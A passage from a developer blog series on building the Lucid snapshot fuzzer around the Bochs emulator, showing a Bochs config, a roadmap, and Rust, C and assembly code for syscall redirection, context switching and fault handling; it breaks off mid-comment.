vgaromimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/VGABIOS-lgpl-latest"
pci: enabled=1, chipset=i440fx
boot: cdrom
ata0-master: type=cdrom, path="/home/h0mbre/custom_linux/lucid_linux.iso", status=inserted
log: bochsout.txt
clock: sync=realtime, time0=local
cpu: model=corei7_skylake_x
cpu: count=1, ips=750000000, reset_on_triple_fault=1, ignore_bad_msrs=1
cpu: cpuid_limit_winnt=0
memory: guest=64, host=64
#display_library: sdl2
</code></pre></div></div>

<p>Really not much to it, you just have to put the <code class="language-plaintext highlighter-rouge">iso</code> in the right device and say that it’s <code class="language-plaintext highlighter-rouge">inserted</code> and you should be good to go. We can actually fuzz stuff now!</p>

<p><img src="/assets/images/pwn/LucidStats.PNG" alt="Lucid Stats" /></p>

<h1 id="conclusion">Conclusion</h1>
<p>Now that it’s conceivable we can fuzz stuff with this, there are a lot of small changes that need to take place, which I will work on in the future:</p>
<ul>
  <li>Mutator: Right now there is a stand-in toy mutator for demo purposes, and I think we actually won’t do any mutation stuff on this blog. I’ll probably add Brandon’s basic <a href="https://github.com/gamozolabs/basic_mutator">mutator</a> to the fuzzer as the default, but I think I can make it bring-your-own input generator fairly easily with Rust traits, we’ll see on that. Maybe that will be a blogpost, who knows.</li>
  <li>Corpus management: Right now there is none! That should be fairly trivial to do however, not worth a blogpost.</li>
  <li>Parallelization: This will be a fun blogpost I think, I’d like the fuzzer to be easily parallelizable and maybe distributed across nodes. I’d like to get this thing fuzzing on my servers I bought a few years ago and never used lol.</li>
  <li>Redqueen: We have such easy access to the relevant instructions that we have to implement this feature, it’s a huge boost to efficiency.</li>
  <li>LibAFL Integration: This will definitely be a blogpost, we want this to eventually serve as the execution engine for LibAFL.</li>
</ul>

<p>Maybe in the next blogpost, we’ll try to fuzz a real target and find an N-Day? That would be fun if the input generation aspect isn’t too much labor. Let me know what you want to see, until next time.</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Background]]></summary></entry><entry><title type="html">Fuzzer Development 3: Building Bochs, MMU, and File I/0</title><link href="https://h0mbre.github.io/Loading_Bochs/" rel="alternate" type="text/html" title="Fuzzer Development 3: Building Bochs, MMU, and File I/0" /><published>2024-03-05T00:00:00+00:00</published><updated>2024-03-05T00:00:00+00:00</updated><id>https://h0mbre.github.io/Loading_Bochs</id><content type="html" xml:base="https://h0mbre.github.io/Loading_Bochs/"><![CDATA[<h2 id="background">Background</h2>

<p>This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the <a href="https://github.com/h0mbre/Lucid">Lucid repository</a>.</p>

<h2 id="introduction">Introduction</h2>

<p>We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.</p>

<p>In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.</p>

<h2 id="syscall-infrastructure-update">Syscall Infrastructure Update</h2>

<p>After putting out the last blogpost, I got some really good feedback and suggestions from Fuzzing Discord legend <a href="https://twitter.com/ButTested">WorksButNotTested</a>, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines altogether and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.</p>

<p>Previously, in our custom Musl code, we would have a C function call like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This is the function that is called when the program needs to make a <code class="language-plaintext highlighter-rouge">syscall</code> with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6_original</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span>
							<span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">__syscall6_original</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span> <span class="p">}</span>
	
    <span class="k">register</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r12</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r12"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_handler</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r13</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r13"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">register_bank</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r14</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r14"</span><span class="p">)</span> <span class="o">=</span> <span class="n">SYSCALL</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r15</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="p">);</span>
    
    <span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span>
        <span class="s">"mov %1, %%rax</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %2, %%rdi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %3, %%rsi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %4, %%rdx</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %5, %%r10</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %6, %%r8</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %7, %%r9</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"call *%%r12</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"mov %%rax, %0</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="o">:</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a4</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a5</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a6</span><span class="p">),</span>
		  <span class="s">"r"</span> <span class="p">(</span><span class="n">r12</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r13</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r14</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r15</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"rax"</span><span class="p">,</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span>
    <span class="p">);</span>
	
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So this was quite involved. I was very fixated on the idea that “Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This led me astray, since such a complicated routine is not needed for our purposes: we are not actually a kernel, we just want to sandbox away syscalls for one specific program that behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">g_lucid_syscall</span><span class="p">)</span>
		<span class="k">return</span> <span class="n">g_lucid_syscall</span><span class="p">(</span><span class="n">g_lucid_ctx</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span>
	
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we simply created a new function pointer global variable in <code class="language-plaintext highlighter-rouge">lucid.h</code> in Musl and gave it a definition in <code class="language-plaintext highlighter-rouge">src/lucid.c</code>, which you can see in the Musl patches in the repo. <code class="language-plaintext highlighter-rouge">g_lucid_syscall</code> looks like this on the Rust side:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">extern</span> <span class="s">"C"</span> <span class="k">fn</span> <span class="nf">lucid_syscall</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span> <span class="n">n</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
    <span class="n">a1</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a2</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a3</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a4</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a5</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">a6</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span>
    <span class="k">-&gt;</span> <span class="nb">u64</span> 
</code></pre></div></div>

<p>We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl. It was a very much appreciated suggestion, and I couldn’t be happier with how it turned out.</p>
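<p>To make the function-pointer arrangement concrete, here is a minimal, self-contained sketch of the idea. It is not Lucid’s or Musl’s actual code: <code class="language-plaintext highlighter-rouge">Context</code>, <code class="language-plaintext highlighter-rouge">SyscallFn</code>, <code class="language-plaintext highlighter-rouge">fake_syscall</code>, and <code class="language-plaintext highlighter-rouge">call_through_pointer</code> are hypothetical names, and the handler only echoes an argument instead of doing any real syscall work. The one thing taken from the post is the shape of the signature: a context pointer, the syscall number, and six arguments, all passed with the C calling convention.</p>

```rust
// Hypothetical stand-in for the execution context; the real struct is larger.
#[repr(C)]
pub struct Context {
    pub syscalls_seen: u64,
}

// Same shape as the handler signature shown above: a context pointer, then the
// syscall number and six arguments.
pub type SyscallFn = extern "C" fn(
    *mut Context, usize, usize, usize, usize, usize, usize, usize,
) -> u64;

// Illustrative handler: counts calls and echoes back the first argument
// instead of entering the kernel.
pub extern "C" fn fake_syscall(
    contextp: *mut Context, _n: usize,
    a1: usize, _a2: usize, _a3: usize, _a4: usize, _a5: usize, _a6: usize,
) -> u64 {
    let context = unsafe { &mut *contextp };
    context.syscalls_seen += 1;
    a1 as u64
}

// Plays the role of the libc side: it only holds a function pointer and calls
// through it, so no registers need to be shuffled by hand.
pub fn call_through_pointer(
    handler: SyscallFn, ctx: &mut Context, n: usize, a1: usize,
) -> u64 {
    handler(ctx as *mut Context, n, a1, 0, 0, 0, 0, 0)
}

fn main() {
    let mut ctx = Context { syscalls_seen: 0 };
    let ret = call_through_pointer(fake_syscall, &mut ctx, 39, 1234);
    println!("ret = {}, syscalls seen = {}", ret, ctx.syscalls_seen);
}
```

<p>Because both sides agree on the C ABI, the compiler places the arguments for us, which is the simplification the syscall refactor was after.</p>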

<h2 id="calling-convention-changes">Calling Convention Changes</h2>

<p>During this refactoring for syscalls, I also simplified the way our context-switching calling convention works. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the <code class="language-plaintext highlighter-rouge">context_switch</code> function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase; it is encapsulated one time, in the <code class="language-plaintext highlighter-rouge">context_switch</code> logic itself. This does require some hacky/brittle code, however. For instance, we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The <code class="language-plaintext highlighter-rouge">context_switch</code> code has been changed to the following:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="s">"C"</span> <span class="p">{</span> <span class="k">fn</span> <span class="nf">context_switch</span><span class="p">();</span> <span class="p">}</span>
<span class="nd">global_asm!</span><span class="p">(</span>
    <span class="s">".global context_switch"</span><span class="p">,</span>
    <span class="s">"context_switch:"</span><span class="p">,</span>

    <span class="c1">// Save the CPU flags before we do any operations</span>
    <span class="s">"pushfq"</span><span class="p">,</span>

    <span class="c1">// Save registers we use for scratch</span>
    <span class="s">"push r14"</span><span class="p">,</span>
    <span class="s">"push r13"</span><span class="p">,</span>

    <span class="c1">// Determine what execution mode we're in</span>
    <span class="s">"mov r14, r15"</span><span class="p">,</span>
    <span class="s">"add r14, 0x8"</span><span class="p">,</span>     <span class="c1">// mode is at offset 0x8 from base</span>
    <span class="s">"mov r14, [r14]"</span><span class="p">,</span>
    <span class="s">"cmp r14d, 0x0"</span><span class="p">,</span>
    <span class="s">"je save_bochs"</span><span class="p">,</span>

    <span class="c1">// We're in Lucid mode so save Lucid GPRs</span>
    <span class="s">"save_lucid: "</span><span class="p">,</span>
    <span class="s">"mov r14, r15"</span><span class="p">,</span>
    <span class="s">"add r14, 0x10"</span><span class="p">,</span>    <span class="c1">// lucid_regs is at offset 0x10 from base</span>
    <span class="s">"jmp save_gprs"</span><span class="p">,</span>             

    <span class="c1">// We're in Bochs mode so save Bochs GPRs</span>
    <span class="s">"save_bochs: "</span><span class="p">,</span>
    <span class="s">"mov r14, r15"</span><span class="p">,</span>
    <span class="s">"add r14, 0x90"</span><span class="p">,</span>    <span class="c1">// bochs_regs is at offset 0x90 from base</span>
    <span class="s">"jmp save_gprs"</span><span class="p">,</span>
</code></pre></div></div>

<p>You can see that once we hit the <code class="language-plaintext highlighter-rouge">context_switch</code> function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of <code class="language-plaintext highlighter-rouge">context-&gt;mode</code> in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.</p>
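<p>One way to keep hardcoded offsets like these honest is to assert them at compile time. The sketch below is an assumption-laden illustration, not Lucid’s real definition: the trimmed <code class="language-plaintext highlighter-rouge">Context</code> and <code class="language-plaintext highlighter-rouge">RegisterBank</code> types and the <code class="language-plaintext highlighter-rouge">bank_offset</code> helper are hypothetical, and the 32-bit representation of <code class="language-plaintext highlighter-rouge">ExecMode</code> is only inferred from the <code class="language-plaintext highlighter-rouge">cmp r14d, 0x0</code> above. The offsets <code class="language-plaintext highlighter-rouge">0x8</code>, <code class="language-plaintext highlighter-rouge">0x10</code>, and <code class="language-plaintext highlighter-rouge">0x90</code> come from the assembly comments. It uses <code class="language-plaintext highlighter-rouge">std::mem::offset_of!</code>, which needs Rust 1.77 or newer.</p>

```rust
use std::mem::offset_of;

// Assumed representation: the assembly compares a 32-bit value against 0 and
// branches to the Bochs path on equality.
#[repr(u32)]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum ExecMode {
    Bochs = 0,
    Lucid = 1,
}

// Hypothetical register bank: 16 GPRs * 8 bytes = 0x80 bytes.
#[repr(C)]
pub struct RegisterBank {
    pub gprs: [u64; 16],
}

// Hypothetical, trimmed-down mirror of the execution context. Only the fields
// whose offsets are quoted in the assembly comments are modeled.
#[repr(C)]
pub struct Context {
    pub context_switch: usize,    // 0x00
    pub mode: ExecMode,           // 0x08
    pub lucid_regs: RegisterBank, // 0x10
    pub bochs_regs: RegisterBank, // 0x90
}

// Compile-time checks: the build fails if a field ever moves.
const _: () = assert!(offset_of!(Context, context_switch) == 0x0);
const _: () = assert!(offset_of!(Context, mode) == 0x8);
const _: () = assert!(offset_of!(Context, lucid_regs) == 0x10);
const _: () = assert!(offset_of!(Context, bochs_regs) == 0x90);

// Mirrors the branch in context_switch: choose the register bank by mode.
pub fn bank_offset(mode: ExecMode) -> usize {
    match mode {
        ExecMode::Bochs => offset_of!(Context, bochs_regs),
        ExecMode::Lucid => offset_of!(Context, lucid_regs),
    }
}

fn main() {
    println!("Bochs bank at {:#x}", bank_offset(ExecMode::Bochs));
    println!("Lucid bank at {:#x}", bank_offset(ExecMode::Lucid));
}
```

<p>With checks like these, reordering a field becomes a build error rather than a silent mismatch between the struct and the assembly.</p>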

<h2 id="introducing-faults">Introducing Faults</h2>

<p>Since the last blog-post, I’ve introduced the concept of <code class="language-plaintext highlighter-rouge">Fault</code> which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error <code class="language-plaintext highlighter-rouge">LucidErr</code>. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any <code class="language-plaintext highlighter-rouge">Fault</code> fatal.</p>

<p>We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and <em>context-switch</em> into starting Bochs:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[inline(never)]</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">start_bochs</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set the execution mode and the reason why we're exiting the Lucid VM</span>
    <span class="n">context</span><span class="py">.mode</span> <span class="o">=</span> <span class="nn">ExecMode</span><span class="p">::</span><span class="n">Lucid</span><span class="p">;</span>
    <span class="n">context</span><span class="py">.exit_reason</span> <span class="o">=</span> <span class="nn">VmExit</span><span class="p">::</span><span class="n">StartBochs</span><span class="p">;</span>

    <span class="c1">// Set up the calling convention and then start Bochs by context switching</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"push r15"</span><span class="p">,</span> <span class="c1">// Callee-saved register we have to preserve</span>
            <span class="s">"mov r15, {0}"</span><span class="p">,</span> <span class="c1">// Move context into R15</span>
            <span class="s">"call qword ptr [r15]"</span><span class="p">,</span> <span class="c1">// Call context_switch</span>
            <span class="s">"pop r15"</span><span class="p">,</span>  <span class="c1">// Restore callee-saved register</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">context</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Execution context that is passed between Lucid and Bochs that tracks</span>
<span class="c1">// all of the mutable state information we need to do context-switching</span>
<span class="nd">#[repr(C)]</span>
<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">LucidContext</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">context_switch</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>  <span class="c1">// Address of context_switch()</span>
</code></pre></div></div>

<p>So then our Lucid state is saved in the <code class="language-plaintext highlighter-rouge">context_switch</code> routine and we are then passed to this logic:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Handle Lucid context switches here</span>
    <span class="k">if</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">is_lucid_mode</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">match</span> <span class="n">exit_reason</span> <span class="p">{</span>
            <span class="c1">// Dispatch to Bochs entry point</span>
            <span class="nn">VmExit</span><span class="p">::</span><span class="n">StartBochs</span> <span class="k">=&gt;</span> <span class="p">{</span>
                <span class="nf">jump_to_bochs</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
            <span class="p">},</span>
            <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">BadLucidExit</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Finally, we call <code class="language-plaintext highlighter-rouge">jump_to_bochs</code>:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Standalone function to literally jump to Bochs entry and provide the stack</span>
<span class="c1">// address to Bochs</span>
<span class="k">fn</span> <span class="nf">jump_to_bochs</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// RDX: we have to clear this register as the ABI specifies that exit</span>
    <span class="c1">// hooks are set when rdx is non-null at program start</span>
    <span class="c1">//</span>
    <span class="c1">// RAX: arbitrarily used as a jump target to the program entry</span>
    <span class="c1">//</span>
    <span class="c1">// RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we</span>
    <span class="c1">// have to manually set it with a `mov`</span>
    <span class="c1">//</span>
    <span class="c1">// R15: holds a pointer to the execution context, if this value is non-</span>
